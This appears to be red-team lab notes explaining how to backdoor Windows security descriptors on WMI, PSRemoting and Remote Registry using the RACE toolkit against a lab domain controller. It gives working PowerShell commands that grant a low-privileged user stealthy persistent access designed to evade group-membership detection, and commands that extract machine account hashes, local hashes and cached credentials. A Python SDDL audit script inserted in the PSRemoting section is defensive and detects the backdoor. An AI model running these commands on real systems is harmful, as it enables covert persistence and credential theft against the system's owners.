Security Descriptors

Red teamers can exploit Windows security descriptors (SDs) to establish stealthy, privilege-independent access to remote management interfaces such as WMI, PSRemoting, and the Remote Registry. These descriptors control who can access and interact with system objects, including remote services. By modifying the Discretionary Access Control List (DACL) of these interfaces using a privileged account, it's possible to grant access to a low-privileged or compromised user without altering group memberships or raising alarms.

Windows represents these permissions using the Security Descriptor Definition Language (SDDL), which structures access control entries (ACEs) in the following format:

ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid

For offensive purposes, the key component is the account_sid — replacing or appending a compromised user’s SID into the descriptor grants that user access. This technique allows backdoor persistence that bypasses typical group membership detection.

WMI

When a user authenticates to a system via WMI, two components enforce permissions: the DCOM security descriptor (viewable in Component Services) and the WMI namespace descriptor (modifiable via WMI Control under Services and Applications). Both must be adjusted for successful access. These can be modified remotely using the RACE toolkit:

# On local machine
Set-RemoteWMI -SamAccountName student337 -Verbose

# On remote machine without explicit credentials
Set-RemoteWMI -SamAccountName dcorp\student337 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose

# On remote machine with explicit credentials
Set-RemoteWMI -SamAccountName dcorp\student337 -ComputerName dcorp-dc -Credential Administrator -namespace 'root\cimv2' -Verbose

This modifies both the WMI namespace and DCOM ACLs to include the SID of student337, granting them WMI query and execution rights. This user can then run WMI queries without having administrative rights:

# Access the target via WMI
Get-WmiObject -Class Win32_OperatingSystem -ComputerName dcorp-dc

The permissions can be cleaned up:

# Remove permissions on remote machine
Set-RemoteWMI -SamAccountName dcorp\student337 -ComputerName dcorp-dc -namespace 'root\cimv2' -Remove -Verbose

PSRemoting

PowerShell Remoting, backed by WinRM, is secured through session configurations — specifically the microsoft.powershell configuration accessed via Get-PSSessionConfiguration. Access is controlled by its security descriptor. Like WMI, this can be altered to include a low-privileged user.

The ACL of microsoft.powershell can be viewed in a GUI dialog as follows:

Set-PSSessionConfiguration -Name microsoft.powershell -ShowSecurityDescriptorUI

Running Set-RemotePSRemoting with the target username and computer name modifies the underlying ACL, giving the user WinRM access. Even if the command returns an error due to transport issues, the change is typically still applied:

# On local machine
Set-RemotePSRemoting -SamAccountName student337 -Verbose

# On remote machine without credentials (the error is expected; it just means that the remote machine did not terminate the connection gracefully)
> Set-RemotePSRemoting -SamAccountName dcorp\student337 -ComputerName dcorp-dc -Verbose
[dcorp-dc] Processing data from remote server dcorp-dc failed with the following error message: The I/O operation has been aborted because of either a thread exit or an application request. For more information, see the about_Remote_Troubleshooting Help topic.
    + CategoryInfo          : OpenError: (dcorp-dc:String) [], PSRemotingTransportException
    + FullyQualifiedErrorId : WinRMOperationAborted,PSSessionStateBroken

# Remove the permissions from the remote machine
Set-RemotePSRemoting -SamAccountName dcorp\student337 -cn dcorp-dc -Remove

Once the descriptor includes the user’s SID, they can open an interactive session without being a member of the Remote Management Users group:

Enter-PSSession dcorp-dc
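From the defender's side, the same descriptor is what an audit compares against a known-good baseline. The Python below is an added example (not from this page or the RACE toolkit): it parses the SDDL ACE format described at the top of the page and reports any allow ACE whose account_sid is outside the expected set, so both an appended and a replaced SID of the kind Set-RemotePSRemoting writes stand out. The SDDL strings are constructed, modelled on the default microsoft.powershell descriptor (BA, RM and IU allowed), and the S-1-5-21 SID is made up.

```python
import re

# Baseline trustees for the default microsoft.powershell endpoint (assumption: Builtin
# Administrators, Remote Management Users, Interactive Users, as SDDL aliases).
EXPECTED_PSREMOTING_TRUSTEES = {"BA", "RM", "IU"}

# Constructed SDDL strings modelled on the default microsoft.powershell descriptor; the
# S-1-5-21-... value is a made-up domain user SID, not a real identity.
CLEAN_SDDL = ("O:NSG:BAD:P(A;;GA;;;BA)(A;;GA;;;RM)(A;;GA;;;IU)"
              "S:P(AU;FA;GA;;;WD)(AU;SA;GXGW;;;WD)")
BACKDOORED_SDDL = ("O:NSG:BAD:P(A;;GA;;;BA)(A;;GA;;;RM)(A;;GA;;;IU)"
                   "(A;;GA;;;S-1-5-21-1111111111-2222222222-3333333333-1105)"
                   "S:P(AU;FA;GA;;;WD)(AU;SA;GXGW;;;WD)")

# A section is one of the letters O/G/D/S, a colon, then everything up to the next marker.
SECTION_RE = re.compile(r"([OGDS]):((?:(?![OGDS]:).)*)")
ACE_RE = re.compile(r"\(([^)]*)\)")


def split_sddl(sddl):
    """Split an SDDL string into its O: (owner), G: (group), D: (DACL), S: (SACL) parts."""
    return {m.group(1): m.group(2) for m in SECTION_RE.finditer(sddl)}


def parse_aces(acl):
    """Parse an ACL string such as 'P(A;;GA;;;BA)(A;;GA;;;RM)' into ACE dicts.
    Each ACE is ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;
    conditional ACEs carry a seventh field, which is kept verbatim under 'extra'.
    """
    aces = []
    for m in ACE_RE.finditer(acl):
        fields = m.group(1).split(";")
        if len(fields) < 6:
            raise ValueError(f"malformed ACE: ({m.group(1)})")
        ace_type, ace_flags, rights, obj_guid, inh_guid, sid = fields[:6]
        aces.append({"type": ace_type, "flags": ace_flags, "rights": rights,
                     "object_guid": obj_guid, "inherit_guid": inh_guid,
                     "sid": sid, "extra": ";".join(fields[6:])})
    return aces


def audit_dacl(sddl, expected_trustees):
    """Compare the DACL's allow ACEs (types A / OA) against a baseline of trustees.
    'unexpected': ACEs granting a trustee outside the baseline (an appended SID);
    'missing': baseline trustees no longer granted access (a replaced account_sid).
    """
    allow = [a for a in parse_aces(split_sddl(sddl).get("D", "")) if a["type"] in ("A", "OA")]
    return {"unexpected": [a for a in allow if a["sid"] not in expected_trustees],
            "missing": set(expected_trustees) - {a["sid"] for a in allow}}
```

On a live host the input would be the SecurityDescriptorSddl property of Get-PSSessionConfiguration, compared against a baseline recorded before the host went into service.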

Remote Registry

Remote Registry is a Windows service that enables remote access to the registry over the network via RPC. When running, it allows reading and writing to critical hives like SAM and SECURITY without shell access.

By modifying registry ACLs to include a user’s SID—using tools like RACE or DAMP—non-admin users can gain access to sensitive data such as local hashes, cached credentials, or the machine account hash. This provides a stealthy method for credential extraction and persistence. Though often disabled by default, it may be active in enterprise environments for legacy management. Unlike WinRM or WMI, it offers no code execution but enables silent post-exploitation.

# Assign remote registry access to the target user
Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student337 -Verbose

# Retrieve machine account hash (and continue with a ST attack!)
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose

# Retrieve local account hash
Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose

# Retrieve domain cached credentials
Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose
